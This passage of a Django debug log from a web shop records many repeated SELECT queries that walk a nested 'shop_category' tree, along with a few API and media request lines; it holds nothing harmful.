"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:09:26,455 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:09:26,460 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:09:26,464 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:09:26,468 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:09:26,472 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:09:26,478 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:09:26,482 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:09:26,486 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:09:26,490 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:09:26,494 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:09:26,501 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:09:26,507 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:09:26,513 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:09:26,517 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:09:26,521 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:09:26,525 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:09:26,530 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:09:26,534 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:09:26,538 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:09:26,543 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:09:26,547 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:09:26] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:09:27] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 DEBUG 2019-12-13 14:09:35,830 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:09:35,842 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:09:35,848 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:09:35,853 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:09:35,868 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:09:35,873 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:09:35,876 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:09:35,878 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:09:35,881 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:09:35,884 utils 20136 140506667599616 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 14:09:35,888 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:09:35,891 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:09:35,892 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:09:35,895 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:09:35,898 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) [13/Dec/2019 14:09:35] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-13 14:09:35,902 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:09:35,906 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:09:35,908 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:09:35,911 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:09:35,913 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:09:35,916 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:09:35,923 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:09:35,925 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:09:35,928 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:09:35,930 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:09:35,933 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:09:35,936 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:09:35,940 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:09:35,942 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:09:35,945 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:09:35,947 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:09:35,950 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:09:35,953 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:09:35,956 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:09:35,958 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:09:35,961 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:09:35,964 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:09:35,968 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:09:35,970 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:09:35,972 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:09:35,975 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:09:35,977 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:09:35,980 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:09:35,982 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:09:35,985 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:09:35,988 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 